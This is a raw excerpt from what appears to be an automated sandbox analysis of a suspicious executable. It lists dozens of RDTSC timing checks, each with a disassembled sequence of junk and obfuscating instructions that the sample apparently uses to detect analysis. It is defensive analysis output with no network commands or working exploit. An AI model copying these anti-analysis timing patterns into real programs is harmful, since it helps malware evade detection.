    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143DCA second address: 1143DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143794 second address: 11437A6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F30F4CF3436h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 114392B second address: 1143944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE2Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143944 second address: 1143962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F30F4CF3446h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1143962 second address: 1143986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F30F50FDE37h 0x0000000a jnc 00007F30F50FDE2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1154505 second address: 115450D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1153F12 second address: 1153F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11599C4 second address: 11599C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11599C8 second address: 11599D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11633BA second address: 1163403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3445h 0x00000007 push edi 0x00000008 jmp 00007F30F4CF343Ch 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F30F4CF343Ch 0x00000018 pushad 0x00000019 jc 00007F30F4CF3436h 0x0000001f jno 00007F30F4CF3436h 0x00000025 jnp 00007F30F4CF3436h 0x0000002b popad 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116A4B6 second address: 116A4C0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1168EA3 second address: 1168EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F30F4CF3436h 0x0000000e push edi 0x0000000f pop edi 0x00000010 jo 00007F30F4CF3436h 0x00000016 popad 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116943E second address: 1169459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F50FDE37h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11695E6 second address: 11695EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116A23A second address: 116A23E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116DCB3 second address: 116DCB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116DCB8 second address: 116DCBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11700E1 second address: 11700FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F30F4CF3446h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116FF8B second address: 116FF8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 116FF8F second address: 116FF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1171743 second address: 117174B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117174B second address: 117175D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F30F4CF3436h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007F30F4CF3436h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0B6 second address: 117B0C0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0C0 second address: 117B0CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F30F4CF343Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0CF second address: 117B0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F30F50FDE33h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 117B0EE second address: 117B10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F4CF3440h 0x00000009 popad 0x0000000a jl 00007F30F4CF3438h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1181D05 second address: 1181D09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1181D09 second address: 1181D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1183FEF second address: 1183FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1183FF5 second address: 1184010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F30F4CF343Ch 0x0000000b pushad 0x0000000c popad 0x0000000d jnp 00007F30F4CF3436h 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1184010 second address: 1184016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 119160B second address: 1191616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F30F4CF3436h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1191207 second address: 119121B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F30F50FDE2Dh 0x0000000b pop edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A64A2 second address: 11A64A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A64A6 second address: 11A64C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE38h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A64C2 second address: 11A6520 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3446h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F30F4CF3444h 0x00000012 push edx 0x00000013 jmp 00007F30F4CF3442h 0x00000018 jmp 00007F30F4CF3448h 0x0000001d pop edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6520 second address: 11A6526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6526 second address: 11A653F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3445h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6AC2 second address: 11A6AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F30F50FDE28h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A6AD3 second address: 11A6ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F30F4CF3436h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A7351 second address: 11A7357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11A7357 second address: 11A736F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jo 00007F30F4CF3436h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11AA32E second address: 11AA333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11ACE48 second address: 11ACE4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11ACF1B second address: 11ACF83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jg 00007F30F50FDE3Eh 0x00000012 nop 0x00000013 jc 00007F30F50FDE2Ah 0x00000019 mov dx, DDB8h 0x0000001d push 00000004h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F30F50FDE28h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000017h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 push 6ADA4672h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F30F50FDE2Bh 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11ACF83 second address: 11ACF8D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F30F4CF343Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B0043 second address: 11B004A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11AFBCA second address: 11AFBCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11AFBCF second address: 11AFBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A5F second address: 11B1A65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A65 second address: 11B1A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A69 second address: 11B1A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A6F second address: 11B1A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 11B1A79 second address: 11B1A7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8BE5 second address: 10C8C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F30F50FDE2Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jg 00007F30F50FDE26h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10C8C04 second address: 10C8C08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0814 second address: 4EF0818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0818 second address: 4EF081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF081E second address: 4EF0824 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0824 second address: 4EF0828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0828 second address: 4EF082C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF082C second address: 4EF083B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF083B second address: 4EF083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF083F second address: 4EF0845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0845 second address: 4EF08CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F30F50FDE34h 0x00000010 mov ah, FDh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 push edi 0x00000017 call 00007F30F50FDE36h 0x0000001c pop esi 0x0000001d pop ebx 0x0000001e pushfd 0x0000001f jmp 00007F30F50FDE30h 0x00000024 sub si, F798h 0x00000029 jmp 00007F30F50FDE2Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F30F50FDE35h 0x00000038 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF08CC second address: 4EF08D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF08D2 second address: 4EF08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF08D6 second address: 4EF09BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F30F4CF3449h 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 pushfd 0x00000016 jmp 00007F30F4CF3448h 0x0000001b or cx, 0DE8h 0x00000020 jmp 00007F30F4CF343Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 jmp 00007F30F4CF3446h 0x0000002d push eax 0x0000002e jmp 00007F30F4CF343Bh 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 mov ecx, 3CA374DBh 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F30F4CF343Eh 0x00000041 sub al, FFFFFFA8h 0x00000044 jmp 00007F30F4CF343Bh 0x00000049 popfd 0x0000004a mov bh, ah 0x0000004c popad 0x0000004d popad 0x0000004e lea eax, dword ptr [ebp-04h] 0x00000051 jmp 00007F30F4CF343Bh 0x00000056 nop 0x00000057 jmp 00007F30F4CF3446h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F30F4CF343Eh 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF09BB second address: 4EF09CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE2Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0AC4 second address: 4EF0ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EF0ACA second address: 4EF0ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0046 second address: 4EE004C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE023C second address: 4EE0240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0240 second address: 4EE0246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0246 second address: 4EE024C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE024C second address: 4EE02AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F30F4CF3440h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F30F4CF3441h 0x00000019 and eax, 6E9E7986h 0x0000001f jmp 00007F30F4CF3441h 0x00000024 popfd 0x00000025 mov eax, 603CCB37h 0x0000002a popad 0x0000002b nop 0x0000002c pushad 0x0000002d movzx eax, di 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02AA second address: 4EE02AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02D7 second address: 4EE02DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02DD second address: 4EE02E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE02E1 second address: 4EE0324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007F30F4CF3449h 0x0000000f jg 00007F3165A015BEh 0x00000015 jmp 00007F30F4CF343Eh 0x0000001a js 00007F30F4CF34CDh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0324 second address: 4EE0341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0341 second address: 4EE0347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0347 second address: 4EE034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE047A second address: 4EE04A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, 4FEAh 0x0000000a popad 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f mov edi, 016AF08Eh 0x00000014 popad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F30F4CF3441h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE04A3 second address: 4EE0504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F30F50FDE2Eh 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov al, 52h 0x00000015 movsx edx, si 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F30F50FDE35h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F30F50FDE38h 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 4EE0504 second address: 4EE0513 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
